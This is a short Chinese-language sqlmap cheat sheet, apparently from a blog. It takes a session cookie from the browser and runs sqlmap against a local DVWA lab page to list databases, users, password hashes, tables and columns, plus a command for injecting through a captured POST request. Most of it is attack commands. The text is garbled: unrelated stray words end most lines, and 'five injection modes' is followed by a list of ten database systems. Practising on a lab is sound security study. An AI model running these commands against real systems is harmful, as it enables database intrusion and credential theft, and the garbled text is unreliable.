sqlmap支持五種不一樣的注入模式:javascript
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDBjava
登陸網頁後在瀏覽器url欄輸入 javascript:document.cookie或者在console欄中輸入document.cookie便可得到cookiemysql
sqlmap -u "http://可能注入的某個提交參數的url" --cookie="此次提交的cookie"sql
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=1129umpqj3j5siclohbkmik7nu" --level 3
--level 表明掃描等級,範圍1~5。數值越大掃描越完整數據庫
--batch --dbs 獲取全部數據庫瀏覽器
--current-db 當前使用的數據庫cookie
--current-user 數據庫使用帳戶session
--users 全部用戶dom
--passwords 數據庫帳戶與密碼工具
-D dvwa --tables 查看指定數據庫(例如:dvwa)的全部表
-D dvwa -T users --columns 查看指定數據庫指定表的全部字段
執行完以後結果以下
顯示結果被記錄在/root/.sqlmap/output/127.0.0.1下面
log是注入的日誌,target.txt是執行的sqlmap命令,session.sqlite能夠用sqlitespy查看書庫內容
可使用burpsuite或者temperdata等工具來抓取post包
sqlmap -r 「c:\tools\request.txt」 -p 「username」 –dbms mysql 指定username參數